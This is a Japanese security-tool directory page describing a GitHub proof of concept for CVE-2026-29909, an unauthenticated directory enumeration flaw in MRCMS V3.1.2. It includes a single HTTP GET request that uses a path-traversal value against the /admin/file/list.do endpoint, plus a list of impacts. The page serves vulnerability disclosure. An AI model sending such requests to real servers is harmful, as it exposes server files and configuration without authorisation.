Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-29909-MRCMS-vulnerability — MRCMS V3.1.2の未認証ディレクトリ列挙PoC。`/admin/file/list.do`における認証欠如を悪用し、サーバーのディレクトリ構造や機密ファイルを開示します。 | Kitploit
ツール/GitHubGitHub/qflksheep/cve-2026-29909-mrcms-vulnerability
脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHubqflksheep/cve-2026-29909-mrcms-vulnerability

CVE-2026-29909-MRCMS-vulnerability

MRCMS V3.1.2の未認証ディレクトリ列挙PoC。`/admin/file/list.do`における認証欠如を悪用し、サーバーのディレクトリ構造や機密ファイルを開示します。

リポジトリを見る
55ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-29909: MRCMS V3.1.2 - 未認証のディレクトリ列挙

CVE ID

CVE-2026-29909

説明

MRCMS V3.1.2には、ファイル管理モジュールに未認証のディレクトリ列挙の脆弱性が存在します。/admin/file/list.doエンドポイントには認証制御と適切な入力検証が欠如しており、リモートの攻撃者が認証情報なしでサーバー上のディレクトリ内容を列挙することが可能です。

概念実証(PoC)

root@kitploit:~
GET /admin/file/list.do?path=../../../src/main/resources/ HTTP/1.1
Host: target-server

影響

  • サーバーのディレクトリ構造への不正アクセス
  • 機密性の高い設定ファイルの露出
  • さらなる攻撃につながる可能性のある情報漏えい

クレジット

発見者: zyh

ツールをダウンロード